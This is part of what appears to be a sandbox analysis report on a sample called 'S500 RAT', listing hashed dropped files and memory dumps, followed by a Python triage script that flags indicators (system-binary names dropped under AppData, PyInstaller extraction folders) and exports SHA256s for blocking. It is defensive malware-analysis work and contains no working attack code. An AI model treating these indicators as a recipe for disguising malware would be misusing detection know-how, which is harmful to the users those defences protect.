MD5 c4989bceb9e7e83078812c9532baeea7
SHA1 aafb66ebdb5edc327d7cb6632eb80742be1ad2eb
SHA256 a0f5c7f0bac1ea9dc86d60d20f903cc42cff3f21737426d69d47909fc28b6dcd
SHA512 fb6d431d0f2c8543af8df242337797f981d108755712ec6c134d451aa777d377df085b4046970cc5ac0991922ddf1f37445a51be1a63ef46b0d80841222fb671

memory/3836-494-0x0000000005190000-0x00000000051C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\unicodedata.pyd

MD5 dfa1f0cd0ad295b31cb9dda2803bbd8c
SHA1 cc68460feae2ff4e9d85a72be58c8011cb318bc2
SHA256 46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10
SHA512 7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

memory/5420-495-0x0000000074800000-0x0000000074FB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\select.pyd

MD5 5c66bcf3cc3c364ecac7cf40ad28d8f0
SHA1 faf0848c231bf120dc9f749f726c807874d9d612
SHA256 26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc
SHA512 034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

memory/5244-501-0x00007FFD51A20000-0x00007FFD51A44000-memory.dmp

memory/5420-502-0x00000000054C0000-0x0000000005AEA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\libcrypto-1_1.dll

MD5 e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1 b0a292065e1b3875f015277b90d183b875451450
SHA256 9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512 145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

C:\Users\Admin\AppData\Local\Temp\_MEI66042\libffi-7.dll

MD5 6f818913fafe8e4df7fedc46131f201f
SHA1 bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA256 3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA512 5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

memory/3836-503-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5420-504-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3836-505-0x0000000005300000-0x0000000005310000-memory.dmp

memory/5244-506-0x00007FFD63E70000-0x00007FFD63E88000-memory.dmp

memory/5244-507-0x00007FFD50E00000-0x00007FFD50E2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\_ctypes.pyd

MD5 48ce90022e97f72114a95630ba43b8fb
SHA1 f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA256 5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
SHA512 7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

memory/5244-508-0x00007FFD68B40000-0x00007FFD68B4F000-memory.dmp

memory/5420-509-0x0000000005200000-0x0000000005222000-memory.dmp

memory/5420-510-0x00000000052A0000-0x0000000005306000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ptvj2qfy.obx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5420-511-0x0000000005420000-0x0000000005486000-memory.dmp

memory/5420-525-0x0000000005CE0000-0x0000000006037000-memory.dmp

memory/5244-529-0x00007FFD50E30000-0x00007FFD51296000-memory.dmp

memory/5420-532-0x00000000060B0000-0x00000000060CE000-memory.dmp

memory/5420-534-0x00000000060E0000-0x000000000612C000-memory.dmp

memory/1616-536-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/1616-538-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/1616-537-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/1616-540-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/1616-543-0x0000000003A00000-0x0000000003E00000-memory.dmp

memory/6924-544-0x0000000000110000-0x0000000000119000-memory.dmp

memory/1616-542-0x0000000075C50000-0x0000000075EA2000-memory.dmp

memory/1616-546-0x0000000000FA0000-0x000000000100D000-memory.dmp

memory/6924-548-0x0000000001F10000-0x0000000002310000-memory.dmp

memory/1616-549-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/6924-550-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/6924-551-0x0000000001F10000-0x0000000002310000-memory.dmp

memory/6924-554-0x0000000075C50000-0x0000000075EA2000-memory.dmp

memory/6924-553-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/5604-569-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp

memory/5604-570-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp

memory/5604-571-0x00007FFD6EF00000-0x00007FFD6EF0F000-memory.dmp

memory/5604-576-0x00007FFD68B40000-0x00007FFD68B4D000-memory.dmp

memory/5420-575-0x0000000007660000-0x0000000007CDA000-memory.dmp

memory/5604-579-0x00007FFD6AC70000-0x00007FFD6AC88000-memory.dmp

memory/6924-578-0x00007FFD744C0000-0x00007FFD746C9000-memory.dmp

memory/5420-577-0x00000000065C0000-0x00000000065DA000-memory.dmp

memory/5420-580-0x0000000008290000-0x0000000008836000-memory.dmp

memory/5420-581-0x00000000074F0000-0x0000000007582000-memory.dmp

memory/5604-573-0x00007FFD681D0000-0x00007FFD681E9000-memory.dmp

memory/6924-574-0x0000000001F10000-0x0000000002310000-memory.dmp

memory/5604-572-0x00007FFD6AC40000-0x00007FFD6AC6C000-memory.dmp

memory/3836-585-0x00000000709F0000-0x0000000070A3C000-memory.dmp

memory/3836-584-0x000000007F1C0000-0x000000007F1D0000-memory.dmp

memory/3836-582-0x0000000007800000-0x0000000007834000-memory.dmp

memory/5420-583-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/3836-594-0x0000000006C30000-0x0000000006C4E000-memory.dmp

memory/3836-595-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5420-597-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3836-598-0x0000000005300000-0x0000000005310000-memory.dmp

memory/5420-599-0x0000000004E80000-0x0000000004E90000-memory.dmp

memory/3836-596-0x0000000007850000-0x00000000078F4000-memory.dmp

memory/3836-600-0x0000000007A40000-0x0000000007A4A000-memory.dmp

memory/3836-601-0x0000000007C40000-0x0000000007CD6000-memory.dmp

memory/3836-602-0x0000000007BC0000-0x0000000007BD1000-memory.dmp

memory/3836-605-0x0000000007C00000-0x0000000007C0E000-memory.dmp

memory/3836-606-0x0000000007C10000-0x0000000007C25000-memory.dmp

memory/3836-607-0x0000000007D00000-0x0000000007D1A000-memory.dmp

memory/3836-608-0x0000000007CF0000-0x0000000007CF8000-memory.dmp

memory/3836-611-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5420-613-0x0000000074800000-0x0000000074FB1000-memory.dmp

memory/5604-618-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp

memory/5604-619-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp
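The Files list above is the sandbox's raw artifact inventory, and most of it is noise: Edge profile files consistent with the sandbox opening the file.io URL in a browser, a crash-handler pipe whose digests are those of zero-length input, and memory dumps with no hashes at all. The entries that matter are the ones the signatures point at: the Zone.Identifier stream on the downloaded "S500 RAT.zip" (the NTFS ADS signature), svchost.exe and explorer.exe dropped under AppData with the names of Windows system binaries (the "Executes dropped EXE" signature), and the _MEI66042 directory that a PyInstaller onefile bootloader unpacks into (the "Detects Pyinstaller" signature). The script below is an added example, not part of this report or of the sandbox's tooling: it parses the report's path-then-digest layout, separates noise from indicators, and exports only the SHA256s worth pushing to a blocklist. The sample text is excerpted verbatim from the entries above; the flag names, the list of borrowed system-binary names and the choice of which categories to export are this example's own assumptions.

```python
import hashlib
import re

# Excerpt of the Files section above, in the report's own layout: a path line,
# then MD5/SHA1/SHA256/SHA512 lines; memory-dump entries carry no hashes.
REPORT_FILES = r"""
\??\pipe\LOCAL\crashpad_4072_DJRBNLFHLQIOUTRN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Downloads\S500 RAT.zip:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 2ef91bf37b3da8cad6751b665bd4e6af
SHA1 5c15bbc721f91855388861d378cf9d26a140cead
SHA256 5263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA512 16f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3

C:\Users\Admin\AppData\Roaming\explorer.exe

MD5 ce453607540a4b0e0c88476042d31791
SHA1 9fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA256 9a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512 f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee

memory/1616-461-0x0000000000FA0000-0x000000000100D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI66042\python310.dll

MD5 3f782cf7874b03c1d20ed90d370f4329
SHA1 08a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA256 2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512 950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
"""

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEI_DIR = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)   # PyInstaller onefile extraction dir
SYSTEM_BINARY_NAMES = {"svchost.exe", "explorer.exe"}  # assumption: names this sample borrows
# Digests of zero-length input: an entry carrying these is an empty file or pipe.
EMPTY = {a: getattr(hashlib, a.lower())(b"").hexdigest() for a in ("MD5", "SHA1", "SHA256", "SHA512")}


def parse_files_section(text):
    """Return [(path, {algo: hexdigest})] in report order; duplicate paths are kept."""
    entries = []
    for line in (ln.strip() for ln in text.splitlines()):
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and entries:
            entries[-1][1][m.group(1)] = m.group(2).lower()
        else:
            entries.append((line, {}))
    return entries


def flags_for(path, hashes):
    """Triage labels for one entry (label names are this example's, not the sandbox's)."""
    low = path.lower()
    if path.startswith("memory/"):
        return ["memory-dump"]
    flags = []
    if hashes and all(hashes[a] == EMPTY[a] for a in hashes):
        flags.append("empty-content")
    if low.endswith(":zone.identifier"):
        flags.append("ntfs-ads-zone-identifier")       # Mark-of-the-Web stream on the download
    if MEI_DIR.search(path):
        flags.append("pyinstaller-extract-dir")
    if low.endswith(".exe") and ("\\appdata\\local\\temp\\" in low or "\\appdata\\roaming\\" in low):
        flags.append("dropped-exe-user-writable")
        if low.rsplit("\\", 1)[-1] in SYSTEM_BINARY_NAMES:
            flags.append("system-binary-name-outside-windows")
    if "\\microsoft\\edge\\user data\\" in low:
        flags.append("browser-profile-noise")
    return flags


def triage_report(text):
    """[(path, flags)] for every entry; an empty flag list means nothing notable."""
    return [(p, flags_for(p, h)) for p, h in parse_files_section(text)]


def ioc_sha256s(text):
    """SHA256s worth exporting: dropped EXEs and PyInstaller payload files, never empty or browser noise."""
    keep = {"dropped-exe-user-writable", "pyinstaller-extract-dir"}
    return {h["SHA256"] for p, h in parse_files_section(text)
            if "SHA256" in h and keep & set(flags_for(p, h))}
```

Run on the full Files section, this leaves the Edge profile and Crashpad entries labelled as noise, keeps repeated paths (the same Preferences file is written several times during the run), and exports three SHA256s: the two dropped executables and the PyInstaller runtime DLL. Memory dumps are listed but never hashed, so they are reported by label only.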